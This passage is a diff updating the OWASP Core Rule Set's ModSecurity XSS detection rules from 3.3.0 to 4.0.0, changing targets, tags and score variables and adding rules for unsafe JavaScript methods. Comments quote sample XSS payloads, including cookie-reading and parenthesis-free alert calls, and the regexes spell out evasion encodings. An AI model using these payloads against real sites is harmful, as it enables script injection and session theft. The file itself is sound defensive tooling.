9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\v/]|[\"'](?:.*[\s\v/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|transitionend)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f-\r ]*?=" \ "id:941160,\ phase:2,\ block,\ @@ -189,20 +207,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [NoScript InjectionChecker] Attributes injection # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\x5c\(\[\.<]|[\s\S]*?(?:\bname\b|\x5c[ux]\d))|data:(?:(?:[a-z]\w+/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|[^-]*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[^:]*?:\W*?u\W*?r\W*?l[\s\S]*?\(" \ "id:941170,\ phase:2,\ block,\ @@ -214,40 +232,41 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # -# [Blacklist Keywords from Node-Validator] -# https://raw.github.com/chriso/node-validator/master/validator.js +# [Deny List Keywords from Node-Validator] +# https://github.com/validatorjs/validator.js/ +# This rule has a stricter sibling 941181 (PL2) that covers the additional payload "-->" # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding .*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:.*?(?:@[i\x5c]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\x5c]|&#x?0*(?:40|28|92|5C);?)))" \ "id:941190,\ phase:2,\ block,\ @@ -267,17 +286,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \ "id:941200,\ phase:2,\ block,\ @@ -289,17 +308,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:j|&#(?:0*(?:74|106)|x0*[46]A);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:v|&#(?:0*(?:86|118)|x0*[57]6);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \ "id:941210,\ phase:2,\ block,\ @@ -311,17 +330,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:v|&#(?:0*(?:118|86)|x0*[57]6);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:b|&#(?:0*(?:98|66)|x0*[46]2);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \ "id:941220,\ phase:2,\ block,\ @@ -333,17 +352,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)]" \ "id:941290,\ phase:2,\ block,\ @@ -487,17 +506,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)). However, +# the characters where the brackets would be are ISO 8859-1 characters: +# - ¼: 0x00BC +# - ¾: 0x00BE +# - ¢: 0x00A2 +# +# And this is how the sequence looks in in US-ASCII: +# +# +# +# This enables an attacker to craft a string that will be delivered in a form that a browser will execute as script +# while being ignored by input filters. +# +# This rule looks for a start tag sequence that looks like "<...>" (checks for hex and plain to be sure). +# Because the bytes matched occur in many different languages encoded as multibyte characters (e.g. UTF-8) +# (e.g. German umlauts, Russian characters) this isn't very helpful and can cause many false positives. We, therefore, +# use a chained rule to also look for an end tag sequence that looks like "". Only if the chained rule matches will +# the request be blocked. +# +# This is of course still not perfect but should at least make it harder to hide most tags using this technique while +# requiring very specific patterns in a language to match, which should get rid of most false positives. +# These rules would, for example, not guard against an element without an end tag, e.g. "". +# +# US-ASCII on Wikipedia: https://en.wikipedia.org/wiki/ASCII +# ISO 8859-1 on Wikipedia: https://en.wikipedia.org/wiki/ISO/IEC_8859-1 -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx \xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe" \ "id:941310,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + t:none,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-tomcat',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + chain" + SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \ + "t:none,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # https://nedbatchelder.com/blog/200704/xss_with_utf7.html @@ -551,26 +606,26 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # Reported by Vladimir Ivanov # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ "id:941350,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + t:none,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ msg:'UTF-7 Encoding IE XSS - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-internet-explorer',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Defend against JSFuck and Hieroglyphy obfuscation of Javascript code @@ -594,7 +649,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # !+[] # ! [] -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx ![!+ ]\[\]" \ "id:941360,\ phase:2,\ block,\ @@ -605,14 +660,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'application-multi',\ tag:'language-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Prevent 941180 bypass by using JavaScript global variables @@ -622,7 +677,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # - /?search=/?a=";+alert(self["document"]["cookie"]);// # - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;// # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ "id:941370,\ phase:2,\ block,\ @@ -633,28 +688,90 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML: tag:'application-multi',\ tag:'language-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# JavaScript methods which take code as a string types are considered unsafe. +# Unsafe JS functions like eval(), setInterval(), setTimeout() +# Unsafe JS constructor new Function() +# https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts +# https://snyk.io/blog/5-ways-to-prevent-code-injection-in-javascript-and-node-js/ +# +# Regular expression generated from regex-assembly/941390.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941390 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)\b(?:eval|set(?:timeout|interval)|new[\s\v]+Function|a(?:lert|tob)|btoa|prompt|confirm)[\s\v]*\(" \ + "id:941390,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:jsDecode,\ + msg:'Javascript method detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# JavaScript function without parentheses +# Reference: https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses +# +# Example Payloads: +# [].sort.call`${alert}1337` +# [].map.call`${eval}\\u{61}lert\x281337\x29` +# 